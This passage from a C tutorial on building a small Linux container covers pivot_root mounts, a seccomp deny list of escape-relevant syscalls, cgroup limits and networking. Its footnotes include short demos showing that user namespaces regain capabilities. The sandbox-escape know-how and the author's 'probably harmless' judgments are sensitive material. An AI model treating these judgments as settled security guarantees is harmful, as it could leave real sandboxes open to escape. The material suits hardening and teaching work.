If file capabilities are supported: add any capability from the calling thread's bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.

We've dropped everything relevant from the bounding set, and dropping further capabilities should be harmless.

CAP_SYS_CHROOT is traditionally abused by changing root to a directory with a setuid root binary and tampered-with dynamic libraries⁴⁴. Additionally, it can be used to escape a chroot "jail"⁴⁵. Neither of those should be relevant in our setup so this should be harmless.

Brad Spengler, in "False Boundaries and Arbitrary Code Execution" says that CAP_SYS_TTYCONFIG can "temporarily change the keyboard mapping of an administrator's tty via the KDSETKEYCODE ioctl to cause a different command to be executed than intended", but again this is an ioctl against a device that should be impossible to access within the mount namespace.

Mounts

The child process is in its own mount namespace, so we can unmount things that it specifically shouldn't have access to. Here's how:

Create a temporary directory, and one inside of it.
Bind mount the user argument onto the temporary directory.
pivot_root, making the bind mount our root and mounting the old root onto the inner temporary directory.
umount the old root, and remove the inner temporary directory.

But first we'll remount everything with MS_PRIVATE. This is mostly a convenience, so that the bind mount is invisible outside of our namespace.

Listing 108: <<mounts>> =

<<pivot-root>>

int mounts(struct child_config *config)
{
	fprintf(stderr, "=> remounting everything with MS_PRIVATE...");
	if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) {
		fprintf(stderr, "failed! %m\n");
		return -1;
	}
	fprintf(stderr, "remounted.\n");

	fprintf(stderr, "=> making a temp directory and a bind mount there...");
	char mount_dir[] = "/tmp/tmp.XXXXXX";
	if (!mkdtemp(mount_dir)) {
		fprintf(stderr, "failed making a directory!\n");
		return -1;
	}

	if (mount(config->mount_dir, mount_dir, NULL, MS_BIND | MS_PRIVATE, NULL)) {
		fprintf(stderr, "bind mount failed!\n");
		return -1;
	}

	char inner_mount_dir[] = "/tmp/tmp.XXXXXX/oldroot.XXXXXX";
	memcpy(inner_mount_dir, mount_dir, sizeof(mount_dir) - 1);
	if (!mkdtemp(inner_mount_dir)) {
		fprintf(stderr, "failed making the inner directory!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	fprintf(stderr, "=> pivoting root...");
	if (pivot_root(mount_dir, inner_mount_dir)) {
		fprintf(stderr, "failed!\n");
		return -1;
	}
	fprintf(stderr, "done.\n");

	char *old_root_dir = basename(inner_mount_dir);
	char old_root[sizeof(inner_mount_dir) + 1] = { "/" };
	strcpy(&old_root[1], old_root_dir);

	fprintf(stderr, "=> unmounting %s...", old_root);
	if (chdir("/")) {
		fprintf(stderr, "chdir failed! %m\n");
		return -1;
	}
	if (umount2(old_root, MNT_DETACH)) {
		fprintf(stderr, "umount failed! %m\n");
		return -1;
	}
	if (rmdir(old_root)) {
		fprintf(stderr, "rmdir failed! %m\n");
		return -1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}
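The path juggling after pivot_root is the fiddly part: the inner directory was created under the temporary directory, but once that directory has become /, the same directory is reachable one level up. Here's a minimal sketch of that renaming as a pure function. The name path_after_pivot is hypothetical, and it uses strrchr where the code above uses basename.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: given the inner directory's path as it was named
   before pivot_root (e.g. "/tmp/tmp.abc123/oldroot.oQ5jOY"), write the
   path it has afterwards, when its parent has become "/".
   Returns 0 on success, -1 on a malformed path or short buffer. */
int path_after_pivot(const char *inner_mount_dir, char *buff, size_t len)
{
	const char *slash;
	int n;
	assert(inner_mount_dir && buff);
	/* Keep the last slash and the final path component. */
	slash = strrchr(inner_mount_dir, '/');
	if (!slash || !slash[1])
		return -1;
	n = snprintf(buff, len, "%s", slash);
	return (n < 0 || (size_t) n >= len) ? -1 : 0;
}
```

This matches the session shown earlier, where the old root ends up being unmounted from /oldroot.oQ5jOY.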

pivot_root is a system call that lets us swap the mount at / with another. Glibc doesn't provide a wrapper for it, but includes a prototype in the man page. I don't really understand, but OK, we'll include our own.

Listing 109: <<pivot-root>> =

int pivot_root(const char *new_root, const char *put_old)
{
	return syscall(SYS_pivot_root, new_root, put_old);
}

It's worth noting that I'm avoiding packing and unpacking containers. This is fertile ground for vulnerabilities⁴⁶; I'll count on the user to ensure that the mounted directory doesn't contain trusted or sensitive files or hard links.

System Calls

I'll be blacklisting system calls that I can demonstrate causing harm or sandbox escapes. Again this isn't the best way to do this, but it seems like the most illustrative.

Docker's documentation and default seccomp profile are reasonable sources for dangerous system calls⁴⁷. They also include obsolete system calls and calls that overlap with restricted capabilities; I'll ignore those.

Disallowed System Calls

Listing 113: <<syscalls>> +=

#define SCMP_FAIL SCMP_ACT_ERRNO(EPERM)

int syscalls()
{
	scmp_filter_ctx ctx = NULL;
	fprintf(stderr, "=> filtering syscalls...");
	if (!(ctx = seccomp_init(SCMP_ACT_ALLOW))

We want to prevent new setuid / setgid executables from being created, since in the absence of user namespaces the contained process could create a setuid binary that could be used by any user to get root.⁴⁸

Listing 116: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(chmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmod), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISUID, S_ISUID))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(fchmodat), 1,
				SCMP_A2(SCMP_CMP_MASKED_EQ, S_ISGID, S_ISGID))
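As an aside from the tangled source, it helps to spell out what SCMP_CMP_MASKED_EQ tests: per the libseccomp documentation, a rule matches when the argument ANDed with the mask equals the datum. The following is a standalone model of that comparison, not a call into libseccomp; masked_eq and chmod_mode_is_blocked are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Model of SCMP_CMP_MASKED_EQ: matches when (arg & mask) == datum. */
int masked_eq(uint64_t arg, uint64_t mask, uint64_t datum)
{
	/* Datum bits outside the mask could never match. */
	assert((datum & ~mask) == 0);
	return (arg & mask) == datum;
}

/* Would the pair of chmod rules above reject this mode? Each rule looks
   at a single bit, so any mode with setuid or setgid set is refused. */
int chmod_mode_is_blocked(mode_t mode)
{
	return masked_eq(mode, S_ISUID, S_ISUID)
		|| masked_eq(mode, S_ISGID, S_ISGID);
}
```

So a mode of 04755 or 02755 would be refused with EPERM, while 0755 and the sticky-bit mode 01777 pass through.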

Allowing contained processes to start new user namespaces can allow processes to gain new (albeit limited) capabilities, so we prevent it.

Listing 117: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(unshare), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(clone), 1,
				SCMP_A0(SCMP_CMP_MASKED_EQ, CLONE_NEWUSER, CLONE_NEWUSER))

TIOCSTI allows contained processes to write to the controlling terminal⁴⁹.

Listing 121: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ioctl), 1,
				SCMP_A1(SCMP_CMP_MASKED_EQ, TIOCSTI, TIOCSTI))

The kernel keyring system isn't namespaced.⁵⁰

Listing 123: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(keyctl), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(add_key), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(request_key), 0)

Before Linux 4.8, ptrace totally breaks seccomp⁵¹.

Listing 127: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(ptrace), 0)

These system calls let processes assign NUMA nodes. I don't have anything specific in mind, but I could see these being used to deny service to some other NUMA-aware application on the host.

Listing 128: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(mbind), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(migrate_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(move_pages), 0)
	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(set_mempolicy), 0)

userfaultfd allows userspace to handle page faults⁵². It doesn't require any privileges, so in theory it should be safe to be called by an unprivileged user. But it can be used to pause execution in the kernel by triggering page faults in system calls. This is an important part in some kernel exploits⁵³. It's only rarely used legitimately, so I'll disable it.

Listing 130: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(userfaultfd), 0)

I was initially worried about perf_event_open because the Docker documentation says it "could leak a lot of information on the host", but it can't be used in our system to see information for out-of-namespace processes⁵⁴. But, if /proc/sys/kernel/perf_event_paranoid is less than 2, it can be used to discover kernel addresses and possibly uninitialized memory. 2 is the default since 4.6, but it can be changed, and relying on it seems like a bad idea⁵⁵.

Listing 135: <<syscalls>> +=

	    || seccomp_rule_add(ctx, SCMP_FAIL, SCMP_SYS(perf_event_open), 0)
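Since the sysctl can change at runtime, a launcher could at least report what it currently sees. This is only a sketch and doesn't replace the seccomp rule; `read_int_file` and `perf_looks_restricted` are hypothetical helpers, not part of contained.c.

```c
#include <stdio.h>

/* Read a single integer from a procfs-style file.
 * Returns 0 and stores the value in *out on success, -1 otherwise. */
int read_int_file(const char *path, int *out)
{
	FILE *f = fopen(path, "r");
	if (!f)
		return -1;
	int ok = fscanf(f, "%d", out) == 1;
	fclose(f);
	return ok ? 0 : -1;
}

/* Hypothetical check: 1 if the level is 2 or higher, 0 if it is lower,
 * -1 if the setting can't be read at all. */
int perf_looks_restricted(void)
{
	int level = 0;
	if (read_int_file("/proc/sys/kernel/perf_event_paranoid", &level))
		return -1;
	return level >= 2;
}
```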

We'll set PR_SET_NO_NEW_PRIVS to 0. The name is a little vague: it specifically prevents setuid and setcap'd binaries from being executed with their additional privileges. This has some security benefits (it makes it harder for an unprivileged user in-container to exploit a vulnerability in a setuid or setcap executable to become in-container root, for example). But it's a little weird, and means that, for example, ping won't work in a container for an unprivileged user⁵⁶.

Listing 140: <<syscalls>> +=

	    || seccomp_attr_set(ctx, SCMP_FLTATR_CTL_NNP, 0)
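If you want to check from inside the container whether the bit ended up set, prctl can report it. A minimal sketch, with `no_new_privs_is_set` as a made-up wrapper name:

```c
#include <sys/prctl.h>

/* Returns 1 if no_new_privs is set for the calling thread, 0 if it is not,
 * and -1 on error (for example on a kernel too old to know the option). */
int no_new_privs_is_set(void)
{
	return prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0);
}
```

With the attribute above set to 0 I'd expect this to return 0 in the contained process, unless something earlier in the process tree already set the bit; once set, it can't be cleared.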

And we'll actually apply it to the process, and release the context.

Listing 141: <<syscalls>> +=

	    || seccomp_load(ctx)) {
		if (ctx) seccomp_release(ctx);
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	seccomp_release(ctx);
	fprintf(stderr, "done.\n");
	return 0;
}

Allowed System Calls

Here are the system calls that are disallowed by the default Docker policy but permitted by this code:

_sysctl is obsolete and disabled by default⁵⁷. alloc_hugepages and free_hugepages ⁵⁸, bdflush ⁵⁹, create_module ⁶⁰, nfsservctl ⁶¹, perfctr ⁶², get_kernel_syms ⁶³, and setup ⁶⁴ are not present on modern Linux.

clock_adjtime, clock_settime ⁶⁵, and adjtime ⁶⁶ depend on CAP_SYS_TIME.

pciconfig_read and pciconfig_write ⁶⁷ and all of the side-effecting operations of quotactl ⁶⁸ are prevented by CAP_SYS_ADMIN.

get_mempolicy and getpagesize reveal information about the memory layout of the system, but they can be made by unprivileged processes, and are probably harmless. pciconfig_iobase can be made by unprivileged processes, and reveals information about PCI devices. ustat ⁶⁹ and sysfs ⁷⁰ leak some information about the filesystems, but are nothing that I see as critical. uselib is more-or-less obsolete, but is just used for loading a shared library in userspace ⁷¹.

sync_file_range2 is sync_file_range with swapped argument order⁷².

readdir is mostly obsolete, but probably harmless⁷³.

kexec_file_load and kexec_load are prevented by CAP_SYS_BOOT ⁷⁴.

nice can only be used to lower priority without CAP_SYS_NICE ⁷⁵.

oldfstat, oldlstat, oldolduname, oldstat, and olduname are just older versions of their respective functions. I expect them to have the same security properties as the modern ones.

perfmonctl ⁷⁶ is only available on IA-64. ppc_rtas ⁷⁷, spu_create ⁷⁸ and spu_run ⁷⁹, and subpage_prot ⁸⁰ are only available on PowerPC. utrap_install is only available on Sparc⁸¹. kern_features is only available on Sparc64, and should be harmless anyway⁸².

I don't believe pivot_root is a problem in our setup (but it could probably be used to circumvent path-based MAC).

preadv2 and pwritev2 are just extensions to preadv and pwritev / readv and writev, which are "scatter input" / "gather output" extensions to read and write ⁸³.
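For anyone who hasn't used the vectored calls, here's a small sketch of "gather output" and "scatter input" with plain writev and readv. The function names are mine; preadv2 and pwritev2 take the same iovec arrays plus an offset and flags.

```c
#include <sys/types.h>
#include <sys/uio.h>
#include <string.h>
#include <unistd.h>

/* Gather two separate buffers into a single write on fd.
 * Returns the number of bytes written, or -1 on error. */
ssize_t gather_write(int fd, const char *first, const char *second)
{
	struct iovec iov[2] = {
		{ .iov_base = (void *)first,  .iov_len = strlen(first)  },
		{ .iov_base = (void *)second, .iov_len = strlen(second) },
	};
	return writev(fd, iov, 2);
}

/* Scatter a single read from fd across two buffers:
 * head is filled first, then whatever is left goes to tail. */
ssize_t scatter_read(int fd, char *head, size_t head_len,
		     char *tail, size_t tail_len)
{
	struct iovec iov[2] = {
		{ .iov_base = head, .iov_len = head_len },
		{ .iov_base = tail, .iov_len = tail_len },
	};
	return readv(fd, iov, 2);
}
```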

Resources

We'd like to prevent badly-behaved child processes from denying service to the rest of the system⁸⁴. Cgroups let us limit memory and cpu time in particular; limiting the pid count and IO usage is also useful. There's a very useful document in the kernel tree about it.

The cgroup and cgroup2 filesystems are the canonical interfaces to the cgroup system. cgroup2 is a little different, and uninitialized on my system, so I'll use the first version here.

Cgroup namespaces are a little different from, for example, mount namespaces. We need to create the cgroup before we enter a cgroup namespace; once we do, that cgroup will behave like the root cgroup inside of the namespace⁸⁵. This isn't the most relevant, since a contained process can't mount the cgroup filesystem or /proc for introspection, but it's nice to be thorough.

I'll set up a struct so I don't have to repeat myself too much, with the following instructions:

Set memory/$hostname/memory.limit_in_bytes, so the contained process and its child processes can't total more than 1GB memory in userspace⁸⁶.
Set memory/$hostname/memory.kmem.limit_in_bytes, so that the contained process and its child processes can't total more than 1GB of kernel memory⁸⁷.
Set cpu/$hostname/cpu.shares to 256. CPU shares are relative weights with a default of 1024; 256 * 4 = 1024, so on a busy system this gives the contained process a quarter of the weight of a default cgroup⁸⁸.
Set pids/$hostname/pids.max to 64, allowing the contained process and its children to have 64 pids at most. This is useful because there are per-user pid limits that we could hit on the host if the contained process occupies too many⁸⁹.
Set blkio/$hostname/blkio.weight to 10, so that it's lower than the rest of the system and prioritized accordingly⁹⁰.

I'll also add the calling process for each of {memory,cpu,blkio,pids}/$hostname/tasks by writing '0' to it.
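As a rough illustration of the cpu.shares arithmetic, assuming shares behave as relative weights among busy sibling cgroups (that's my reading of the cgroup v1 scheduler documentation), the expected fraction of CPU time can be sketched like this. `cpu_fraction` is a made-up helper, not a kernel interface.

```c
/* Expected share of CPU time when every sibling cgroup is busy, assuming
 * cpu.shares is a relative weight:
 *     fraction = own_shares / (own_shares + sum of sibling shares) */
double cpu_fraction(unsigned long own_shares, unsigned long sibling_shares)
{
	unsigned long total = own_shares + sibling_shares;
	if (total == 0)
		return 0.0;
	return (double)own_shares / (double)total;
}
```

Under that assumption, 256 shares against 768 shares' worth of busy siblings works out to exactly a quarter, and against a single busy sibling at the default 1024 it's a fifth. When nothing else is busy the cgroup can use the whole CPU, since shares only matter under contention.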

Listing 181: <<resources>> +=

#define MEMORY "1073741824"
#define SHARES "256"
#define PIDS "64"
#define WEIGHT "10"
#define FD_COUNT 64

struct cgrp_control {
	char control[256];
	struct cgrp_setting {
		char name[256];
		char value[256];
	} **settings;
};
struct cgrp_setting add_to_tasks = {
	.name = "tasks",
	.value = "0"
};

struct cgrp_control *cgrps[] = {
	& (struct cgrp_control) {
		.control = "memory",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "memory.limit_in_bytes",
				.value = MEMORY
			},
			& (struct cgrp_setting) {
				.name = "memory.kmem.limit_in_bytes",
				.value = MEMORY
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "cpu",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "cpu.shares",
				.value = SHARES
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "pids",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "pids.max",
				.value = PIDS
			},
			&add_to_tasks,
			NULL
		}
	},
	& (struct cgrp_control) {
		.control = "blkio",
		.settings = (struct cgrp_setting *[]) {
			& (struct cgrp_setting) {
				.name = "blkio.weight",
				.value = WEIGHT
			},
			&add_to_tasks,
			NULL
		}
	},
	NULL
};

Writing to the cgroups version 1 filesystem works like this⁹¹:

In each controller, you can create a cgroup with a name with mkdir. For memory, mkdir /sys/fs/cgroup/memory/$hostname.
Inside of that you can write to the individual files to set values. For example, echo $MEMORY > /sys/fs/cgroup/memory/$hostname/memory.limit_in_bytes.
You can write a pid to tasks to add the process tree to the cgroup. "0" is a special value that means "the writing process".

so I'll iterate over that structure and fill in the values.

Listing 183: <<resources>> +=

int resources(struct child_config *config)
{
	fprintf(stderr, "=> setting cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
		char dir[PATH_MAX] = {0};
		fprintf(stderr, "%s...", (*cgrp)->control);
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1) {
			return -1;
		}
		if (mkdir(dir, S_IRUSR | S_IWUSR | S_IXUSR)) {
			fprintf(stderr, "mkdir %s failed: %m\n", dir);
			return -1;
		}
		for (struct cgrp_setting **setting = (*cgrp)->settings; *setting; setting++) {
			char path[PATH_MAX] = {0};
			int fd = 0;
			if (snprintf(path, sizeof(path), "%s/%s", dir,
				     (*setting)->name) == -1) {
				fprintf(stderr, "snprintf failed: %m\n");
				return -1;
			}
			if ((fd = open(path, O_WRONLY)) == -1) {
				fprintf(stderr, "opening %s failed: %m\n", path);
				return -1;
			}
			if (write(fd, (*setting)->value, strlen((*setting)->value)) == -1) {
				fprintf(stderr, "writing to %s failed: %m\n", path);
				close(fd);
				return -1;
			}
			close(fd);
		}
	}
	fprintf(stderr, "done.\n");

I'll also lower the hard limit on the number of file descriptors. The file descriptor number, like the number of pids, is per-user, and so we want to prevent in-container processes from occupying all of them. Setting the hard limit sets a permanent upper bound for this process tree, since I've dropped CAP_SYS_RESOURCE ⁹².

Listing 185: <<resources>> +=

	fprintf(stderr, "=> setting rlimit...");
	if (setrlimit(RLIMIT_NOFILE,
		      & (struct rlimit) {
			.rlim_max = FD_COUNT,
			.rlim_cur = FD_COUNT,
		})) {
		fprintf(stderr, "failed: %m\n");
		return 1;
	}
	fprintf(stderr, "done.\n");
	return 0;
}
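Here's a standalone sketch of the same rlimit idea that can be tried outside of the container code. `cap_nofile` is a hypothetical helper; it only ever lowers the limit, so it needs no privileges.

```c
#include <sys/resource.h>

/* Lower both the soft and hard RLIMIT_NOFILE to at most `limit`.
 * It never raises the hard limit, so it works without CAP_SYS_RESOURCE.
 * Returns 0 on success, -1 on error. */
int cap_nofile(rlim_t limit)
{
	struct rlimit cur;
	if (getrlimit(RLIMIT_NOFILE, &cur))
		return -1;
	/* Don't ask for more than the current hard limit allows. */
	if (cur.rlim_max < limit)
		limit = cur.rlim_max;
	struct rlimit next = { .rlim_cur = limit, .rlim_max = limit };
	return setrlimit(RLIMIT_NOFILE, &next);
}
```

After `cap_nofile(64)`, a later setrlimit that tries to raise rlim_max again should fail with EPERM for a process without CAP_SYS_RESOURCE, which is the property the container relies on.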

We'd also like to clean up the cgroup for this hostname. There's built-in functionality for this, but we would need to change system-wide values to do it cleanly⁹³. Since we have the containing process waiting on the contained process, it's simple to do it this way. First we move the containing process back into the root tasks; then, since the child process is finished, and leaving the pid namespace SIGKILLs its children, the tasks file is empty. We can safely rmdir at this point.

Listing 187: <<resources>> +=

int free_resources(struct child_config *config)
{
	fprintf(stderr, "=> cleaning cgroups...");
	for (struct cgrp_control **cgrp = cgrps; *cgrp; cgrp++) {
		char dir[PATH_MAX] = {0};
		char task[PATH_MAX] = {0};
		int task_fd = 0;
		if (snprintf(dir, sizeof(dir), "/sys/fs/cgroup/%s/%s",
			     (*cgrp)->control, config->hostname) == -1
		    || snprintf(task, sizeof(task), "/sys/fs/cgroup/%s/tasks",
				(*cgrp)->control) == -1) {
			fprintf(stderr, "snprintf failed: %m\n");
			return -1;
		}
		if ((task_fd = open(task, O_WRONLY)) == -1) {
			fprintf(stderr, "opening %s failed: %m\n", task);
			return -1;
		}
		if (write(task_fd, "0", 1) == -1) {
			fprintf(stderr, "writing to %s failed: %m\n", task);
			close(task_fd);
			return -1;
		}
		close(task_fd);
		if (rmdir(dir)) {
			fprintf(stderr, "rmdir %s failed: %m\n", dir);
			return -1;
		}
	}
	fprintf(stderr, "done.\n");
	return 0;
}

Networking

Container networking takes a little too much explanation for this space. It usually works like this:

Create a bridge device.
Create a virtual ethernet pair and attach one end to the bridge.
Put the other end in the network namespace.
For outside networking access, the host needs to be set to forward (and possibly NAT) packets.

Having multiple contained processes sharing a bridge device would mean they're all on the same LAN from the host's perspective. So ARP spoofing is a recurring issue with containers that work this way⁹⁴.

The canonical way to do this from C is the rtnetlink interface; it would probably be easier to use ip link ....

We could also limit the network usage with the net_prio cgroup controller⁹⁵.

Footnotes:

"Linux User Namespaces Might Not Be Secure Enough" by Erica Windisch:

If a (real) root user has had the SYS_CAP_ADMIN capability removed, but then creates a user namespace, this capability is restored for the (fake) root user. That is, before creating the namespace, ‘mount’ would be denied, but following the creation of the user namespace, the ‘mount’ syscall would magically work again, albeit in a limited fashion. While limited in function, it’s significant enough that given a (real) root user and a kernel with user namespaces, Linux capabilities may be completely subverted.

and man 7 user_namespaces says:

The child process created by clone(2) with the CLONE_NEWUSER flag starts out with a complete set of capabilities in the new user namespace.

and "Understanding and Hardening Linux Containers" again

User namespaces also allows for ``interesting'' intersections of security models, whereas full root capabilities are granted to new namespace. This can allow CLONE_NEWUSER to effectively use CAP_NET_ADMIN over other network namespaces as they are exposed, and if containers are not in use. Additionally, as we have seen many times, processes with CAP_NET_ADMIN have a large attack surface and have resulted in a number of different kernel vulnerabilities. This may allow an unprivileged user namespace to target a large attack surface (the kernel networking subsystem) whereas a privileged container with reduced capabilities would not have such permissions. See Section 5.5 on page 39 for a more in-depth discussion on this topic.

We can demonstrate this behavior (on a host with user namespaces compiled in) with

Listing 1: subverting_networking.c

/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static  subverting_networking.c \*/
/*                   -o subverting_networking" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sched.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/sockios.h>

int main (int argc, char **argv)
{
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	/* this is how you create a bridge... */
	int sock = 0;
	if ((sock = socket(PF_LOCAL, SOCK_STREAM, 0)) == -1) {
		fprintf(stderr, "++ socket failed: %m\n");
		return 1;
	}
	if (ioctl(sock, SIOCBRADDBR, "br0")) {
		fprintf(stderr, "++ ioctl failed: %m\n");
		close(sock);
		return 1;
	}
	close(sock);
	fprintf(stderr, "++ success!\n");
	return 0;
}

  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ ./subverting_networking
  ++ success!
  alpine-kernel-dev:~$

but we're not actually that powerful.

Listing 2: subverting_setfcap.c

/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -lcap -static subverting_setfcap.c \*/
/*                   -o subverting_setfcap" */
/* End: */
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <linux/capability.h>
#include <sys/capability.h>

int main (int argc, char **argv)
{
	if (unshare(CLONE_NEWUSER)) {
		fprintf(stderr, "++ unshare failed: %m\n");
		return 1;
	}
	cap_t cap = cap_from_text("cap_net_admin+ep");
	if (cap_set_file("example", cap)) {
		fprintf(stderr, "++ cap_set_file failed: %m\n");
		cap_free(cap);
		return 1;
	}
	cap_free(cap);
	return 0;
}

  alpine-kernel-dev:~$ whoami
  lizzie
  alpine-kernel-dev:~$ touch example
  alpine-kernel-dev:~$ ./subverting_setfcap
  ++ cap_set_file failed: Operation not permitted

init/Kconfig:1207@c8d2bc

config USER_NS
	bool "User namespace"
	default n
	help
	  This allows containers, i.e. vservers, to use user namespaces
	  to provide different user info for different servers.

	  When user namespaces are enabled in the kernel it is
	  recommended that the MEMCG option also be enabled and that
	  user-space use the memory control groups to limit the amount
	  of memory a memory unprivileged users can use.

	  If unsure, say N.

Ubuntu switches CONFIG_USER_NS on, but patches it so that unprivileged use can be disabled with a sysctl, unprivileged_userns_clone.

Listing 3: 92e575e769cc50a9bfb50fb58fe94aab4f2a2bff

commit 92e575e769cc50a9bfb50fb58fe94aab4f2a2bff
Author: Serge Hallyn <redacted>
Date:   Tue Jan 5 20:12:21 2016 +0000

    UBUNTU: SAUCE: add a sysctl to disable unprivileged user namespace unsharing
    
    It is turned on by default, but can be turned off if admins prefer or,
    more importantly, if a security vulnerability is found.
    
    The intent is to use this as mitigation so long as Ubuntu is on the
    cutting edge of enablement for things like unprivileged filesystem
    mounting.
    
    (This patch is tweaked from the one currently still in Debian sid, which
    in turn came from the patch we had in saucy)
    
    Signed-off-by: Serge Hallyn <redacted>
    [bwh: Remove unneeded binary sysctl bits]
    Signed-off-by: Tim Gardner <redacted>

Debian has the same behavior:

Listing 4: debian/patches/debian/add-sysctl-to-allow-unprivileged-CLONE_NEWUSER-by-default.patch

From: Serge Hallyn <redacted>
Date: Fri, 31 May 2013 19:12:12 +0000 (+0100)
Subject: add sysctl to disallow unprivileged CLONE_NEWUSER by default
Origin: http://kernel.ubuntu.com/git?p=serge%2Fubuntu-saucy.git;a=commit;h=5c847404dcb2e3195ad0057877e1422ae90892b8

add sysctl to disallow unprivileged CLONE_NEWUSER by default

This is a short-term patch.  Unprivileged use of CLONE_NEWUSER
is certainly an intended feature of user namespaces.  However
for at least saucy we want to make sure that, if any security
issues are found, we have a fail-safe.

Signed-off-by: Serge Hallyn <redacted>
[bwh: Remove unneeded binary sysctl bits]
---

Grsecurity disables it entirely for users without CAP_SYS_ADMIN, CAP_SETUID, and CAP_SETGID.

Listing 5: https://grsecurity.net/test/grsecurity-3.1-4.7.9-201610200819.patch

--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -84,6 +84,21 @@ int create_user_ns(struct cred *new)
 	    !kgid_has_mapping(parent_ns, group))
 		return -EPERM;
 
+#ifdef CONFIG_GRKERNSEC
+	/*
+	 * This doesn't really inspire confidence:
+	 * http://marc.info/?l=linux-kernel&m=135543612731939&w=2
+	 * http://marc.info/?l=linux-kernel&m=135545831607095&w=2
+	 * Increases kernel attack surface in areas developers
+	 * previously cared little about ("low importance due
+	 * to requiring "root" capability")
+	 * To be removed when this code receives *proper* review
+	 */
+	if (!capable(CAP_SYS_ADMIN) || !capable(CAP_SETUID) ||
+			!capable(CAP_SETGID))
+		return -EPERM;
+#endif

and Arch Linux has it off.

Listing 6: {linux} 3.13 add CONFIG_USER_NS

Comment by William Kennington (Webhostbudd) - Sunday, 06 October 2013, 03:55 GMT

I agree with Florian, allowing non-root users to take advantage of
elevating themselves to a local root seems like a huge attack
surface. Preferably this would be a sysctl with a huge warning
attached to it when it is switched on.

Comment by Daniel Micay (thestinger) - Monday, 24 November 2014, 03:55 GMT

[...]  Arch doesn't add new features via patches. If you want to see
this feature enabled, then land something like this upstream. Note
that CONFIG_USER_NS is already enabled in the linux-grsec package
because it fully removes the ability to have unprivileged user
namespaces.

It would have been cool to include Red Hat's patches here, but I couldn't find them.

⁴

Most of this section is cribbed from the example at the bottom of man 2 clone.

⁵

Listing 11: clone_stack.c

/* -*- compile-command: "gcc -Wall -Werror clone_stack.c -o clone_stack" -*- */
#define _GNU_SOURCE
#include <sched.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define STACK_SIZE (1024 * 1024)

int child (void *_)
{
	int stack_value = 0;
	fprintf(stderr, "pre-execve, stack is ~%p\n", &stack_value);
	execve("./show_stack", (char  *[]) {"./show_stack", 0}, NULL);
	return 0;
}

int main (int argc, char **argv) {
	void *stack = malloc(STACK_SIZE);
	clone(child, stack + STACK_SIZE, SIGCHLD, NULL);
	wait(NULL);
	return 0;
}

Listing 12: show_stack.c

/* -*- compile-command: "gcc -Wall -Werror -static show_stack.c -o show_stack" -*- */
#include <stdio.h>

int main (int argc, char **argv)
{
	int stack_value = 0;
	fprintf(stderr, "post-execve, stack is ~%p\n", &stack_value);
	return 0;
}

  [lizzie@empress linux-containers-in-500-loc]$ ./clone_stack
  pre-execve, stack is ~0x7f3f98deefec
  post-execve, stack is ~0x7ffd14d2291c

